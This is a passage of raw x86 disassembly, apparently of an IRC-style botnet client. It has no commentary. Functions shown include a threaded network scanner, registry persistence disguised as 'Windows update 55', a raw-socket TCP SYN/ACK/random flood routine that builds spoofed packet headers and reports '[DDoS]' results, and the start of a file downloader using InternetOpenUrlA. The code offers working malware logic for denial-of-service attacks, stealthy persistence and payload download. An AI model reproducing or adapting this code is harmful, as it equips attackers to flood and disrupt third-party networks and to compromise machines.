mov dword_428D68[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_4022E3
push 8
call sub_411E82
add esp, 150h
cmp eax, ebx
jnz short loc_402ADA
mov esi, offset dword_429D08
push esi
call ds:dword_41B080 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_41B07C ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_402ADA
lea eax, [ebp+Source]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax ; Dest
call _sprintf
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_402AC4
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_405E64
add esp, 14h
loc_402AC4: ; CODE XREF: sub_402A0C+99�j
lea eax, [ebp+Source]
push eax
call sub_402D63
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_402ADA: ; CODE XREF: sub_402A0C+63�j
; sub_402A0C+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_41B048
mov edi, ebx
mov dword_428D6C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_402BA7
loc_402AF8: ; CODE XREF: sub_402A0C+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+Source]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 8 ; int
push eax ; Source
call sub_411C3A
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_430544[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_4027F8
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_402B72
loc_402B67: ; CODE XREF: sub_402A0C+164�j
cmp [ebp+var_4], ebx
jnz short loc_402B99
push 1Eh
call esi ; Sleep
jmp short loc_402B67
; ---------------------------------------------------------------------------
loc_402B72: ; CODE XREF: sub_402A0C+159�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_402D63
add esp, 10h
loc_402B99: ; CODE XREF: sub_402A0C+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_402AF8
loc_402BA7: ; CODE XREF: sub_402A0C+E6�j
cmp [ebp+var_30], ebx
jz loc_402C51
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_402BBC: ; CODE XREF: sub_402A0C+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_428D68[eax*8]
push eax
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_402C0A
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_405E64
add esp, 14h
loc_402C0A: ; CODE XREF: sub_402A0C+1DF�j
lea eax, [ebp+Source]
push eax
call sub_402D63
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_428D6C[eax*8], ebx
call esi ; Sleep
push 8
call sub_411E82
cmp eax, 1
pop ecx
jnz short loc_402C41
push offset dword_429D08
call ds:dword_41B080 ; RtlDeleteCriticalSection
loc_402C41: ; CODE XREF: sub_402A0C+228�j
push [ebp+var_2C]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_402C51: ; CODE XREF: sub_402A0C+19E�j
; sub_402A0C+25D�j
mov eax, [ebp+var_2C]
cmp dword_428D6C[eax*8], 1
jnz loc_402BBC
push 7D0h
call esi ; Sleep
jmp short loc_402C51
sub_402A0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402C6B(char *Str2,int)
sub_402C6B proc near ; CODE XREF: sub_409557+3C42�p
var_4 = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset Str1
mov edi, 0B8h
loc_402C7F: ; CODE XREF: sub_402C6B+33�j
cmp byte ptr [esi], 0
jz short loc_402CA2
push [ebp+Str2] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402CA2
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_430340
jl short loc_402C7F
jmp short loc_402CE4
; ---------------------------------------------------------------------------
loc_402CA2: ; CODE XREF: sub_402C6B+17�j
; sub_402C6B+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi ; Size
push 0 ; Val
lea ebx, Str1[esi]
push ebx ; Dst
call _memset
push 17h ; Count
push [ebp+Str2] ; Source
push ebx ; Dest
call _strncpy
push 9Fh ; Count
lea eax, dword_42F7D8[esi]
push [ebp+arg_4] ; Source
push eax ; Dest
call _strncpy
add esp, 24h
inc dword_424E64
pop ebx
loc_402CE4: ; CODE XREF: sub_402C6B+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_402C6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402CEB(int,char *Str,int)
sub_402CEB proc near ; CODE XREF: sub_409557+4DED�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset aAliasList ; "-[Alias List]-"
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
xor edi, edi
mov esi, offset Str1
loc_402D15: ; CODE XREF: sub_402CEB+72�j
cmp byte ptr [esi], 0
jz short loc_402D50
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 2Ch
loc_402D50: ; CODE XREF: sub_402CEB+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_430340
jl short loc_402D15
pop edi
pop esi
leave
retn
sub_402CEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D63 proc near ; CODE XREF: sub_4013EE+323�p
; .text:00401A16�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_41B084 ; GetLocalTime
mov ebx, offset Source
mov edi, 80h
mov esi, offset byte_42A620
loc_402D85: ; CODE XREF: sub_402D63+3D�j
cmp byte ptr [ebx], 0
jz short loc_402D9C
push 7Fh ; Count
lea eax, [ebx+80h]
push ebx ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_402D9C: ; CODE XREF: sub_402D63+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_402D85
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_402D63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402DD7(char *Format,char Args)
sub_402DD7 proc near ; CODE XREF: sub_409277+F7�p
; sub_409557:loc_40CF1C�p ...
Dest = byte ptr -80h
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 14h
leave
retn
sub_402DD7 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402E03(int,char *Str,int,int)
sub_402E03 proc near ; CODE XREF: sub_409557+4CE4�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset byte_42A620
xor ecx, ecx
loc_402E0A: ; CODE XREF: sub_402E03+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset Source
jl short loc_402E0A
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_402E3A
push ecx ; int
push [esp+8+arg_8] ; int
push esi ; int
push [esp+10h+Str] ; Str
push [esp+14h+arg_0] ; int
call sub_405E64
add esp, 14h
loc_402E3A: ; CODE XREF: sub_402E03+1F�j
push esi
call sub_402D63
pop ecx
pop esi
retn
sub_402E03 endp
; =============== S U B R O U T I N E =======================================
sub_402E43 proc near ; CODE XREF: sub_4013EE+2B3�p
; .text:004019A6�p
arg_0 = dword ptr 4
push esi
mov esi, offset byte_42A620
loc_402E49: ; CODE XREF: sub_402E43+27�j
cmp byte ptr [esi], 0
jz short loc_402E5E
push [esp+4+arg_0] ; int
push esi ; Str
call sub_406F77
pop ecx
test eax, eax
pop ecx
jnz short loc_402E70
loc_402E5E: ; CODE XREF: sub_402E43+9�j
add esi, 80h
cmp esi, offset Source
jl short loc_402E49
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402E70: ; CODE XREF: sub_402E43+19�j
push 1
pop eax
pop esi
retn
sub_402E43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E75 proc near ; DATA XREF: sub_409557+4D97�o
Dest = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_402EC8
push edx ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push offset aLogBegin ; "[LOG]: Begin"
push eax ; Str
push [ebp+var_11C] ; int
call sub_405E64
add esp, 14h
loc_402EC8: ; CODE XREF: sub_402E75+33�j
cmp [ebp+Str], 0
jz short loc_402EE8
lea eax, [ebp+Str]
push eax ; Str
call _atoi
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_402EE8
mov [ebp+var_8], eax
loc_402EE8: ; CODE XREF: sub_402E75+5A�j
; sub_402E75+6E�j
and [ebp+arg_0], 0
mov esi, offset byte_42A620
loc_402EF1: ; CODE XREF: sub_402E75+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_402F4B
cmp byte ptr [esi], 0
jz short loc_402F3A
cmp [ebp+Str], 0
jz short loc_402F20
cmp [ebp+var_4], 0
jnz short loc_402F20
lea eax, [ebp+Str]
push eax ; int
push esi ; Str
call sub_406F77
pop ecx
test eax, eax
pop ecx
jz short loc_402F3A
loc_402F20: ; CODE XREF: sub_402E75+90�j
; sub_402E75+96�j
push edi ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push esi ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_405E64
add esp, 14h
loc_402F3A: ; CODE XREF: sub_402E75+87�j
; sub_402E75+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset Source
jl short loc_402EF1
loc_402F4B: ; CODE XREF: sub_402E75+82�j
lea eax, [ebp+Dest]
push offset aLogListComplet ; "[LOG]: List complete."
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_402F85
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_118]
push eax ; Str
push [ebp+var_11C] ; int
call sub_405E64
add esp, 14h
loc_402F85: ; CODE XREF: sub_402E75+EE�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_18]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_402E75 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402FA4(char *Str)
sub_402FA4 proc near ; CODE XREF: sub_403014+4�p
; sub_40724A+1E�p ...
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_41F770
xor esi, esi
mov ebx, offset aWindowsUpdate5 ; "Windows update 55"
loc_402FB7: ; CODE XREF: sub_402FA4+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_42EB6C ; RegCreateKeyExA
cmp [ebp+Str], esi
jz short loc_402FF1
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_42EBD8 ; RegSetValueExA
jmp short loc_402FFB
; ---------------------------------------------------------------------------
loc_402FF1: ; CODE XREF: sub_402FA4+2F�j
push ebx
push [ebp+var_4]
call dword_42EB2C ; RegDeleteValueA
loc_402FFB: ; CODE XREF: sub_402FA4+4B�j
push [ebp+var_4]
call dword_42EB90 ; RegCloseKey
add edi, 8
cmp edi, offset Mode ; "rb"
jl short loc_402FB7
pop edi
pop esi
pop ebx
leave
retn
sub_402FA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; int __cdecl sub_403014(char *Str)
sub_403014 proc near ; CODE XREF: sub_403014+16�j
; DATA XREF: WinMain(x,x,x,x)+43D�o
Str = dword ptr 4
push [esp+Str] ; Str
call sub_402FA4
pop ecx
push dword_41F768
call ds:dword_41B048 ; Sleep
jmp short sub_403014
sub_403014 endp
; =============== S U B R O U T I N E =======================================
sub_40302C proc near ; CODE XREF: sub_403067+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_403061
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_403045: ; CODE XREF: sub_40302C+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_41B1E8[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_403045
pop edi
pop ebx
loc_403061: ; CODE XREF: sub_40302C+E�j
mov eax, esi
pop esi
not eax
retn
sub_40302C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_403067(char *Filename)
sub_403067 proc near ; CODE XREF: sub_403520+24A�p
var_10 = dword ptr -10h
Filename = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx ; Mode
call _malloc
mov [esp+10h+var_10], offset Mode ; "rb"
push [esp+10h+Filename] ; Filename
mov esi, eax
call _fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4030B6
loc_40308C: ; CODE XREF: sub_403067+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4030BA
inc ebx
push ebx ; NewSize
push esi ; Memory
call _realloc
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4030B6
push edi ; File
push 1 ; Count
lea eax, [esi+ebx-1]
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
jmp short loc_40308C
; ---------------------------------------------------------------------------
loc_4030B6: ; CODE XREF: sub_403067+23�j
; sub_403067+39�j
xor eax, eax
jmp short loc_4030D5
; ---------------------------------------------------------------------------
loc_4030BA: ; CODE XREF: sub_403067+29�j
dec ebx
push ebx
push esi
call sub_40302C
push esi ; Memory
mov ebx, eax
call _free
push edi ; File
call _fclose
add esp, 10h
mov eax, ebx
loc_4030D5: ; CODE XREF: sub_403067+51�j
pop edi
pop esi
pop ebx
retn
sub_403067 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030D9 proc near ; DATA XREF: sub_409557+326C�o
Dest = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = dword ptr -18Ch
Str = byte ptr -10Ch
Str1 = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+var_20C]
push eax ; Str
lea eax, [ebp+var_28C]
push eax ; int
call sub_4034C2
push eax
lea eax, [ebp+Dest]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_403169
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_294] ; int
call sub_405E64
add esp, 14h
loc_403169: ; CODE XREF: sub_4030D9+6E�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_290]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_4030D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40318B(int,int,char *Str1,int,int)
sub_40318B proc near ; CODE XREF: sub_4034C2+40�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
Dst = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_42EB38 ; WSAStartup
test eax, eax
jz short loc_4031CB
xor eax, eax
jmp loc_4034BE
; ---------------------------------------------------------------------------
loc_4031CB: ; CODE XREF: sub_40318B+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_42EC54 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4034B6
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_42EB94 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4034AC
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_42EBB4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_42EBB4 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_42EBB4 ; htons
mov [ebp+var_12], ax
call _rand
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_42EBB4 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_42EBB0 ; htonl
push offset Str2 ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40329B
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_4032EF
; ---------------------------------------------------------------------------
loc_40329B: ; CODE XREF: sub_40318B+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4032B7
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_4032EF
; ---------------------------------------------------------------------------
loc_4032B7: ; CODE XREF: sub_40318B+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4032EF
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_4032EF: ; CODE XREF: sub_40318B+10E�j
; sub_40318B+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_42EBB4 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+Str1], ebx
call ds:dword_41B08C ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B088 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call __allmul
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_40333D: ; CODE XREF: sub_40318B+2E2�j
; sub_40318B+2F0�j
mov [ebp+var_4], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_42EBB4 ; htons
mov [ebp+var_14], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_42EBB4 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_42EBB0 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_42EBB4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40845A
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40845A
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_42EC14 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_403480
add [ebp+Str1], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B088 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4034A9
jl loc_40333D
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4034A9
jmp loc_40333D
; ---------------------------------------------------------------------------
loc_403480: ; CODE XREF: sub_40318B+2CB�j
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 10h
jmp short loc_4034AC
; ---------------------------------------------------------------------------
loc_4034A9: ; CODE XREF: sub_40318B+2E0�j
; sub_40318B+2EE�j
mov ebx, [ebp+Str1]
loc_4034AC: ; CODE XREF: sub_40318B+78�j
; sub_40318B+31C�j
push [ebp+var_20]
call dword_42EC48 ; closesocket
pop esi
loc_4034B6: ; CODE XREF: sub_40318B+5B�j
call dword_42EB20 ; WSACleanup
mov eax, ebx
loc_4034BE: ; CODE XREF: sub_40318B+3B�j
pop edi
pop ebx
leave
retn
sub_40318B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4034C2(int,char *Str,char *Str1,int)
sub_4034C2 proc near ; CODE XREF: sub_4030D9+4F�p
arg_0 = dword ptr 4
Str = dword ptr 8
Str1 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4082EB
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_C] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; int
push [esp+20h+Str1] ; Str1
lea eax, [edx+esi+100h]
push eax ; int
push esi ; int
call sub_40318B
add esp, 20h
test eax, eax
jnz short loc_403511
push 1
pop eax
loc_403511: ; CODE XREF: sub_4034C2+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4034C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403520 proc near ; DATA XREF: sub_409557+3075�o
; sub_409557+36E9�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
Dst = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
Str = byte ptr -2C8h
var_248 = byte ptr -248h
Filename = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
Memory = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_42EB68
call dword_42EAD4 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_4039AC
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+Filename]
push 40000000h
push eax
call ds:dword_41B05C ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_4035E7
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4035CA
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_405E64
add esp, 14h
loc_4035CA: ; CODE XREF: sub_403520+88�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
push [ebp+var_48]
call sub_411F56
pop ecx
pop ecx
push esi
